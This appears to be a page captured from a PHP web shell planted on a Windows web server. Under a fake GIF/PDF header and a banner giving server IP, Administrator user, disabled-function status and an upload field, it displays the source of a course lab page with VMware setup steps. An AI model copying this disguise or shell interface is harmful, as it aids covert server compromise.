GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/MichaelMalz/CST2608/_Archive/Lab01/VMware/ |
Upload File : |
<? // Lab01.php $TRACK = "<b>".basename(__FILE__)."</b> (".__FILE__.")\n<ol>\n"; ini_set('include_path',ini_get('include_path').PATH_SEPARATOR.$_SERVER['DOCUMENT_ROOT']."/"); // Add the DOCUMENT_ROOT to the include_path. $thisFile=__FILE__; $thisLine=__LINE__; include("application.phpinc"); $thisFile=__FILE__; $thisLine=__LINE__; include('Course/courseInfo.phpinc'); $thisFile=__FILE__; $thisLine=__LINE__; include('../../classInfo.phpinc'); $assignmentNumber = 1; $assignmentType = "Lab"; $assignmentTitle = "VMware setup"; $evaluationType = ""; $evaluationTitle = $assignmentTitle; if (strlen($assignmentNumber) == 1) { $assignmentName = $assignmentType."0".$assignmentNumber; $evaluationName = $evaluationType."0".$assignmentNumber; } else { $assignmentName = $assignmentType.$assignmentNumber; $evaluationName = $evaluationType.$assignmentNumber; } if ($evaluationTitle != '') $evaluationTitle = ' - '.$evaluationTitle; $title = $assignmentType." ".$assignmentNumber.": ".$assignmentTitle; $headTitle = '_CST_ - '.$courseNumber.' '.$courseTitle.' - '.$title; $pageTitle = $courseNumber.' '.$courseTitle.'<br />'.$title; $pageMenu = 'Course/courseMenu.phpinc'; $smallTitle = true; $thisFile = __FILE__; include('Common/pageHeader.phpinc'); $sectionTitle = $courseNumber.' '.$courseTitle.' - '.$title; $thisFile = __FILE__; include('Common/sectionHeader.phpinc'); ?> <p> <fieldset class="pio"><legend>VMware setup</legend><span class="normal"> <ol> <li> Create new virtual machine. Click on <b>New Virtual Machine</b>. <br /> <img src="VMware01_CreateNewVirtualMachine.png" alt="VMware Home"> </li> <li> Welcome screen. Click <b>Next</b>. <br /> <img src="VMware02_Welcome.png" align="Welcome screen"> </li> <li> Select the Appropriate Conficuration. Leave <b>Typical</b> selected and click <b>Next</b>. <br /> <img src="VMware03_Typical.png" alt="Select the Appropriate Conficuration"> </li> <li> Select a Guest Operating System. Select <b>Linux</b> and <b>Ubuntu</b> and click <b>Next</b>. <br /> <img src="VMware04_LinuxUbuntu.png" alt="Select a Guest Operating System"> </li> <li> Name the Virtual Machine. Enter a name for the virtual machine (I entered <b>JimServer</b>) and a location for the files (I entered <b>D:\VMware\JimServer</b>) and click <b>Next</b>. <br /> <img src="VMware05_NameAndLocation.png" alt="Name the Virtual Machine"> </li> <li> Network Type. Select <b>Use network address translation (NAT)</b> and click <b>Next</b>. <br /> <img src="VMware06_NetworkType.png" alt="Network Type"> </li> <li> Specify Disk Capacity. Enter the virtual disk size (I left it at 8GB), Check the <b>Split disk into 2 GB files</b>, and click <b>Finish</b>. <br /> <img src="VMware07_SpecifyDiskCapacity.png" alt="Specify Disk Capacity"> </li> <li> Virtual machine created successfully. Thats it! Click <b>Close</b>. <br /> <img src="VMware08_Finish.png" alt="Virtual machine created successfully"> </li> </ol> </fieldset> <? include('Course/ExampleFlles.phpinc'); include('../../ReferencesResources.phpinc'); $thisFile = __FILE__; include('Common/sectionFooter.phpinc'); $thisFile = __FILE__; include('Common/pageFooter.phpinc'); if ($TRACK != '') $_SESSION['TRACK'] .= "<li>End ".basename(__FILE__)."</ol></li>\n"; ?>